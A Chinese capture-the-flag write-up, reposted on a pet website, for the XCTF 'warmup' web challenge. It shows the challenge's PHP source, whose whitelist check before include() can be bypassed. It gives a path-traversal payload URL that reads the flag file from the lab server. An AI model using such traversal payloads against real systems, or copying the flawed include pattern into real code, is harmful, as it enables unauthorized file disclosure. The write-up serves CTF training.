首页 分享 攻防世界XCTF:warmup

攻防世界XCTF:warmup

来源:萌宠菠菠乐园 时间:2024-09-15 08:24

在这里插入图片描述
F12发现注释:<!--source.php-->
在这里插入图片描述

<?php class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" />"; } ?>

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748

访问访问hint.php回显:

flag not here, and flag in ffffllllaaaagggg
在这里插入图片描述

当下面成立时可以传入传参
$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];
在?file=hint.php后面加上个问号,使它能够截取到我们传入的

Payload:http://111.198.29.45:58125/source.php?file=hint.php?../../../../../ffffllllaaaagggg 1

在这里插入图片描述

相关知识

XCTF攻防世界web新手练习
魔兽塔魔
宠物风暴官方版免费下载
《神武4》高强力收益测试 物攻宠物打书必备
《宠物世界》
《新倚天剑与屠龙刀》暑假宝宝乐翻天
逆水寒:宠物打工时代来临,玩家如何日赚斗金?
【宠物世界杂志】宠物世界杂志品牌、价格
宠物世界网
世界名犬馆

网址: 攻防世界XCTF:warmup https://www.mcbbbk.com/newsview161058.html

所属分类:萌宠日常
上一篇: 2021年中国宠物科学喂养行业研
 下一篇: 使用hive的beeline连接

推荐分享

缅因猫能长多大 一种体型较大的猫
缅因猫能长多大 一种体型较大的猫
警惕狗贩的骗人损招 星期狗的症状特征
警惕狗贩的骗人损招 星期狗的症状特征
最新分享
如何正确饲养菲律宾悬吊鹦鹉(掌握关键方法,让宠物健康成长)
如何正确饲养菲律宾悬吊鹦鹉(掌握关键方法
红尾黑凤头鹦鹉的饲养方法(了解这些,让你的宠物更健康快乐)
红尾黑凤头鹦鹉的饲养方法(了解这些,让你
澳洲国王鹦鹉的饲养方法(如何照顾健康快乐绿翅金刚鹦鹉饲养全攻略(打造幸福健康的宠虎皮鹦鹉温度多少合适?让我们一起探讨最佳伯克氏鹦鹉的饲养方法(让你的伯克氏鹦鹉健女子网购活体鹦鹉感染鹦鹉热 养鹦鹉要注意白顶亚马逊鹦鹉饲养全指南(如何养护一只健虎皮鹦鹉的寿命是多少年?揭秘常见宠物鹦鹉一份全面的折衷鹦鹉饲养指南(一份全面的折
分享热点
布偶猫吃什么对毛发好 原来这些食物就可以
布偶猫吃什么对毛发好
这九种宠物既新奇又独特,看完你爱上没有?
这九种宠物既新奇又独